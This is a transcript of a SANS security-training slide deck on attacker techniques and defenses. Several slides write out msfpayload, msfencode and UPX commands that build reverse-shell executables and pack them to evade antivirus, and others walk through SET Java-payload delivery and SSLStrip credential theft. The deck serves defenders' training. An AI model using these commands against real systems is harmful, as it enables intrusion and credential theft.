Presentation is loading. Please wait.

Presentation is loading. Please wait.

If I wake up evil... John Strand SANS Black Hills Information Security.

Similar presentations


Presentation on theme: "If I wake up evil... John Strand SANS Black Hills Information Security."— Presentation transcript:

1 If I wake up evil... John Strand SANS Black Hills Information Security

2 State of the Hack (Why We are Losing) The attackers have a clear advantage on us o They don't play by any rules o We do... o They have a well defined structure for learning o Little to no attribution Many think that compliance equals security o This is not true o Compliance with regulations is a guideline o They are a series of objectives Many times we don't have time to "know" our networks and systems

3 Malware Example: Conficker Devastating worm that infected over 15 million computers Infection through MS08-067, file shares and removable media o Microsoft disabled autorun in response to this worm Highly effective defenses o Tries to kill AV every second o Blocks certain DNS lookups o Disables Auto update o Disables Safe-mode Updates itself Uses crypto

4 State Of The Hack: Sony 100 Million accounts compromised Shut down their network for 23 days $171 million in lost revenue and costs By the way, there were multiple Sony hacks this quarter Cross analysis between 1 million Sony passwords and 250K Gawker passwords revealed that many people reuse passwords –http://www.theregister.co.uk/2011/06/08/password_re_use_sur vey/ Also, many people use password complexity exactly like we have trained them –And it still does not work

5 State Of The Hack: Bank Of America “Hundreds” of accounts compromised –But in this case size does not matter The accounts we targeted “high value” targets The attack was launched by an insider Overly elaborate attack –Ordered new checks, forwarded phone calls and arranged for the check pickup –The attackers were unaware of automatic bill-pay...? 10 million dollars stolen How do we defend against an insider?

6 State of the Hack RSA About the RSA attack.. –It might be worse than we thought, and we thought it was bad Attacks against LMCO, L-3 and possibly Northrup Grumman SecureID’s generate a “random” pin every 60 seconds This pin is based on a random seed file that is shared byt the server and to token If you obtain the seed file from the server (.ASC or.XML) you can clone the pin on the fob What if RSA was storing PINs for its customers? What if those PINS were compromised Unfortunately, we don’t know a whole lot

7 Wait, what? Hi John, Company X is asked every day if Product X could have stopped the latest du jour threat that is bypassing traditional blacklisting- based antivirus. On June 26th, 2010, we showed how Product X beat down Stuxnet. On August 26th, Product X beat down DLL Hijacking attempts. The threats keep coming, so which ones should we beat down next?

8 How did it Infect? USB… Yep, plain old USB The easiest way to bypass the firewall, IDS and IPS There were a number of 0-days –.lnk file vulnerability –Print Spooler (CVE ) –Win32 Keyboard Layout Vulnerability –Privilege escalation via Task Schedule There has been some misinformation about the Task Scheduler vulnerability from some AV vendors –You do not need to be in the local administrators group It also used some older exploits like –Conficker anyone?

9 On to the Details Remember the Windows baseline section of 464? –tasklist /m –tasklist /m s7otbxdx.dll Stuxnet used dll replacement to insert execution redirection In fact, it moved s7otbxdx.dll to s7otbxsx.dll inserted its own s7otbxdx.dll –This is important because it means the attackers had an understanding of the original code –93 of the original 109 exports are forwarded to the renamed s7otbxsx.dll –The remaining 16 get us excited

10 How did it Communicate? Once it infects a system it tries to connect to two sites to verify connectivity: –www.mypremierfutbol.com –www.todaysfutbol.com –Clearly not targeting a US audience…. P2P Communication C2 servers in Malaysia and Denmark –Checking Versions It also uses peer-to-peer communication Remember what we covered in the network lab? –Yeah, it tried to spread via shares –Watch that system-to-system communication Watch for PLC systems connecting to the Internet

11 Clouds.... Evil Clouds.

12 What is Cloud Computing? I had to look it up –I hear about it a lot, but I don’t have a clear concept of what it is Straight to the Wiki! –“Cloud computing is Internet-based computing, whereby shared resources, software and information are provided to computers and other devices on-demand, like a public utility.” I get it… It is like a Bot-Net! Based on Vendor Information it looks like it is going to make me irrelevant

13 But What is it? “It is a paradigm shift..” Oh oh… This is going to be good. It is a paradigm shift following the mainframe and client-server shifts that preceded it. Details are abstracted from the users who no longer have need of, expertise in, or control over the technology infrastructure "in the cloud" that supports them. [1 ] Cloud computing describes a new supplement, consumption and delivery model for IT services based on the Internet, and it typically involves the provision of dynamically scalable and often virtualized resources as a service over the Internet. [2][3 ] It is a byproduct and consequence of the ease-of-access to remote computing sites provided by the Internet. [4] The term cloud is used as a metaphor for the Internet, based on the cloud drawing used in the past to represent the telephone network [5], and later to depict the Internet in computer network diagrams as an abstraction of the underlying infrastructure it represents. [6] Typical cloud computing providers deliver common business applications online which are accessed from a web browser, while the software and data are stored on servers.

14 I Am Letting Wikipedia Write All of My Presentations! Security could improve due to centralization of data [35], increased security-focused resources, etc., but concerns can persist about loss of control over certain sensitive data, and the lack of security for stored kernels [36]. Security is often as good as or better than under traditional systems, in part because providers are able to devote resources to solving security issues that many customers cannot afford. [37] Providers typically log accesses, but accessing the audit logs themselves can be difficult or impossible. Furthermore, the complexity of security is greatly increased when data is distributed over a wider area and / or number of devices.

15 Looking Forward To Unemployment?

16 But Wait!!! Did they say “Internet” “The term cloud is used as a metaphor for the Internet.” But the Internet is Evil!! –How can this be so?

17 Lets set the stage.. We have to know who it is we are working with Who are the people we are defending? Who is attacking? –What are their capabilities? –What are their means? What are the tools we have to defend ourselves? Who is on our side?

18 Your Users They are trying to go places they shouldn’t Security is not a major concern –They never get into trouble “It was just a pop-up!” –They “think” they know what it would look like if they were attacked. No skull and crossbones? Good to go! You “think” they are “stupid” Are they?

19 Granny Max Loves to gamble Likes Polka Dots Likes anything with “Polka” in it Thinks the CD tray is a coaster Collects Gnomes Bypasses your outbound web filters buy using a third party anonymizing proxy

20 Phil… From Accounting Works with numbers…... and Terabytes of Porn! Has a “slight” problem Does not get along with Granny Max Hates cats Bypasses your filtering by using a SSH tunnel through his home system

21 The “Average” Users Do not gamble… –… at work Do not surf porn… –….at work Likes: Facebook, YouTube, Politics, eBay, Googling, Fantasy football, Fark, Drudge Report, the Huffington Post, CNN, Amazon Dislikes: Web filters Quickly becoming friends with Phil and Gran Max to learn ways to bypass your filtering

22 The Bad Guys Motivated –Can you imagine their HR department? Wicked skilled (more on this later) They either own or infect many of the sites your more “interesting” users are going to The Bobs

23 The Cloud The Internet is big… … really big You just won't believe how vastly hugely mindboggingly big it is... Most of it is worthless.. and Evil! Many of your users will not stop clicking until they visit every site

24 Lets Compromise An Account

25 Bypassing AV "But Anti-Virus software will protect us... Right?" Anti-Virus, like all software, has its limitations Do not believe for one second that it is the ultimate protection It works great for detecting and removing known malware That means someone was infected before you Many dedicated and targeted attackers are not concerned about anti virus software But why?

26 How Would an Attacker Bypass AV? –There are a variety of ways –But remember the goal is to create a "new" signature –Attackers can use packers to "pack" the malicious code This creates a self-extracting and executing file In the process of packing the executable is scrambled Functions may not be where AV expects them to be –Attackers can also use tools to "encode" the executable This has been around for a long time in tools like ADMutate and PEScramble One technique these tools use is to add a large number of "jumps" to the code making it difficult to reverse

27 No Tricks Let's say an attacker wanted to create an executable that created a reverse connecting, memory based rootkit Straight msfpayload to an exe./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=8081 X > PlainMetrev_8081.exe

28 Not Too Bad..

29 But Wait!!!

30 Thank You Panda…

31 Add a Bit of UPX.. Attackers can use compression as a means to bypass AV products One product that attackers often use is the Ultimate Packer and Unpacker for Executables (UPX) upx -2 -f -o PlainMetRevUPX.exe PlainMetRev.exe o This will create an executable that is compressed with a setting of 2 o The settings go from 1 to 9 o The higher the level the greater the compression o 2 works very well for bypassing AV

32 Cut in Half?

33 What if We Used the Browser for Communication?./msfpayload windows/shell/reverse_http LHOST= LPORT=9091 X > PlainShellRevHttp_8081.exe This is slightly different than the previous example This is a shell that makes a reverse HTTP connection

34 Down to Only 17.95%

35 What if We Try a Reverse http Shell with Encoding?./msfpayload windows/shell/reverse_http LHOST= LPORT=8080 R |./msfencode -b '' " - t exe -o EncShellRevHttp.exe We are now using encoding on the executable This means the executable will be different every time it is created The default encoder with the Metasploit framework is "Shikata ga nai" This means "There is nothing that can be done about it" in Japanese

36 Race to 0

37 Bypassing IDS There are a variety of ways to bypass AV But what about IDS? Turns out many IDS products have the same "signature-based" problem Some claim to be "heuristic" We can fragment our attacks o Separate the attack across multiple packets We can encode the attacks o Into Base 64 o Unicode o Hex

38 Bypassing IDS: Uncreative, Yet, Effective Ways –Why not have the victim system connect to us! We bypass many firewall and IDS/IPS restrictions We can make it look like standard web traffic – We could have our attacks go over Secure Sockets Layer Many organizations are using SSL to protect their traffic in transit However, it often blinds them to attacks against their web servers Attackers can try Cross Site Scripting, SQL Injection and Command injection all day long –Remember just because there is a lock it does not mean it is "secure"

39 Blending with Normal Processes One of the easiest ways for an attacker to hide or even attack your systems is to "blend-in" Many people think that an attacker will only use exploits to "spread" through your network o This is not true Rather, they will utilize built-in services and commands to compromise additional systems o SSH or RDP with accounts and passwords from the first system compromised This will not be caught by your IDS because it is "normal" traffic

40 Exploit Demo

41 Java as a Payload Java is an excellent payload option –Installed pretty much everywhere –Users are accustomed to clicking “Run” for Java apps SET has the ability to take a Metasploit payload and export it to a.jar file In this example we will be taking the default SET web page and inserting a.jar file into it When a user connects to our site the java app will load Shell will ensue Its what's for breakfast.

42 Starting SET Nice ASCII Art!

43 SETting Options Hack By Numbers! Please select Option Number 2

44 SET Website Attack Vectors The Option We Will Be Using Very Effective If You Know HTML Import your own website is even more effective if you are not particularly good at HTML Import your own website is even more effective if you are not particularly good at HTML

45 Choosing Java as Our Payload Can be flaky

46 Setting the Payload Type Meterpreter and VNC payloads are nice - However, they can be unstable Shell Reverse_TCP tends to be the most stable in testing Knowing if your target is running 64 bit can be a big help Please Select Option 1 for 32 Bit Or, 6 for Windows 64 Bit Systems Please Select Option 1 for 32 Bit Or, 6 for Windows 64 Bit Systems

47 Setting the Encoder We Are Going to Use shikata_ga_nai We Will Encode Twice

48 Linux and OS X Payloads Please Choose “no” Metasploit Starting

49 Payload in Waiting Reverse Payload Listening on 4444 Because Cows are Cool

50 Browsing to Your Site Everyone Clicks “Run” Linux IP]

51 Got Shell? Yes!!! Now you can wield your Windows Command-line Kung-fu! Interacting with Our Shell Time to do the “Happy Dance”

52 There are other ways...

53 ISR Evilgrade Modular exploit tool to spoof Software Update Responses –"Yes, there IS an update available!" Delivers executable of your choosing to the victim Includes support for multiple vulnerable updaters –JRE, WinZip, WinAmp, OpenOffice, iTunes, Notepad++ and more Relies on MITM from third-party attack –LAN and Ettercap, or remote with DNS manipulation Perl-based console interface similar to Cisco IOS –Output and navigation slightly messy

54 USB Threat Update Let’s say you disabled Autorun on all your systems Further, let’s say you disable USB mass storage devices You can still be compromised by a tin of Altoids Enter Programmable HID USB Keystroke Dongle The latest attack vector from IronGeek He is now trying to find fixes Implemented S.E.T Upload any Metasploit Payload

55 Wireless Device Control “My SSID is P0wned” “But we do not have wireless in our network!” –Are you sure? One access point can bypass all of your external controls “Free Wireless Internet” anyone? Attackers do not need to find an access point –They just need to find a client –Karmetasploit is evil This also goes for your phone –Do you use GSM? –http://www.shmoocon.org/presentations-all.html#srsly

56 Maltego By Paterva Focus is on “extreme” reconnaissance GUI based display –I know… I know.. But the GUI rocks We can pull –Personal Information –Sites –Additional addresses –Friends? –Family? –Intrests

57 Who is John Strand? Step 1: Click Address Step 2: Click Here Step 3: Fill In

58 Starting the Transformations Right click And Select All Transforms

59 It can be a lot of data Click Yes

60 What did we find Linkedin A friend

61 What about SSL? There are a number of different ways to hijack SSL –See WebMTIM from dsniff Unfortunately the user will receive “negative feedback” –Just another way of saying they get a pop-up box Most users will click through –The paranoid ones will not So how do you hijack the overly paranoid user?

62 We can use SSLStrip Another great tool from Moxie Marlinspike This tool strips away SSL from the end user –Hence the name The HTTPS will become HTTP –No negative feedback to the user The vast number of users will not notice –Even the very paranoid ones The 300 We need to use a tool like dsniff to hijack the traffic and a tool like iptables to redirect the traffic to where sslstrip is waiting

63 SSLStrip Get your targets IP and Gateway

64 SSL Strip

65 SSLStrip: iptables

66 SSLStrip: arpspoof

67 SSLStrip: Got one! Now Surf to and try to log in!http://gmail.com You should see some activity in SSLStrip!!

68 SSLStrip: Checking the logs Looks like we got some data!!!

69 SSLStrip: Looking at the log

70 SSL Strip: /hackme Paydirt!!!

71 Starting over..

72 Back to Basics… Baseline your systems –Processes, DLL’s for Core applications, Users, etc. Baseline your network traffic –Why would you allow PLC systems to connect to the Internet? Monitor those baselines –If at all possible, do this hourly Don’t use shady Russian contractors with compromised websites Train everyone, because everyone is a target –Secure the human Yes, even you –Sounds paranoid, I know

73 Risk and the 20 Critical Controls

74 Autostart Entry Points There are a number of Autostart entry points on your Windows systems Run RunOnce RunOnceEx There are a lot more of these than we can cover in a few slides –Useruinit –Boot.ini There needs to be a better way to look at what is going to automatically start on our Windows computers

75 Sysinternals Autoruns

76 Find Evil

77 Red Curtain

78 Malware Detection on Linux Rather than look for specific malware we can also look for indications of compromise Rootkit Hunter and chkrootkit do this They also look for a few specific binaries Very easy to set up and use Looks for –Certain hashes –Wrong File permissions –Hidden Files –Orphaned files Why use both tools?

79 Malwarednsscrap.pl Sometimes the best way to know you are compromised is to check your DNS cache Not 100%, but nothing is This script queries your DNS server and sees if there are any DNS entries that are for “bad” sites It can automatically pull down a blacklist and do a compare However, you can provide your own blacklist Best used daily (think Nagios)

80 Running Malwarescraper.pl Good Bad

81 Offensive Countermeasures: Is this allowed?

82 The Split When discussing security we need to be of two separate minds –Offensive –Defensive A little lesson on OODA loops –Observe –Orient –Decide –Act In our current defensive postures how can we do this

83 Dynamic Blacklisting offfor /L %i in (1,1,1) /f "tokens=3" %j in ('netstat -nao ^| find ^":3333^"') /f "tokens=1 delims=:" %k in ("%j") do netsh advfirewall firewall add rulename="WTF" dir=in remoteip=%k localport=any protocol=TCP action=block Easy copy and paste link from: –http://pauldotcom.com/wiki/index.php/Episode203

84 Dynamic Blacklisting Linux ~]# while [ 1 ] ; echo "started" ; do IP=`nc -v -l -p >&1 1> /dev/null | grep from | cut -d[ -f 3 | cut -d] -f 1`; iptables -A INPUT -p tcp -s ${IP} -j DROP ; done Easy copy and paste link from: –http://pauldotcom.com/wiki/index.php/Episode204

85 Portsentry Does the same thing we covered in the Blacklisting section However, it does offer more flexibility –Logging –Rerouting traffic –Blocking through hosts.deny A bit of an older tool (2003) but still surprisingly effective Set it up before an audit or a penetration test and make your Linux/Unix systems “go away” Still requires a listener (nc) on a honeyport.

86 Word Web-Bugs Very easy to use Supposed to be used for penetration testing However this tactic works great at tracking intellectual property Not all ways of finding attribution need to result in shell access Far less likely to crash a system Embed this code in a spreadsheet called SSN.xls and watch how fast an attacker runs the macros

87 How does it Work? It simply inserts a reference to a css or image to a web server When the doc is opened it tries to open the URL Direct connection!

88 Metasploit De-cloak Engine Hunting back where the attackers are coming from This is done by having the victim/attacker connect back using a number of applications –Java –iTunes –Word –FTP –Quicktime –DNS By having them connect in a number of different ways with different applications we increase the odds of finding their “real” IP address

89 Running the De-Cloak Engine

90 Results

91 Implementing the Decloak Engine You can use their servers –Generate a MD5 string based on the attacker/victims information –Embed an iframe directing them to the decloak site –Recover the information gathered from decloak.net You can also implement their API’s on your servers –Implement a custom DNS server –Create a Database for the results –Embed the the Java and Flash applications from decloak.net

92 SANS Denver!!! June SANS Security Essentials Bootcamp Style Management 414: SANS +S™ Training Program for the CISSP® Certification Exam –ISACA10 = 10% off Management 512: SANS Security Leadership Essentials For Managers Security 504: Hacker Techniques, Exploits & Incident Handling Security 505: Securing Windows Developer 522: Defending Web Applications Security Essentials Forensics 558: Network Forensics

93 John’s Contact Information Strandjs = twitter


Download ppt "If I wake up evil... John Strand SANS Black Hills Information Security."

Similar presentations


Ads by Google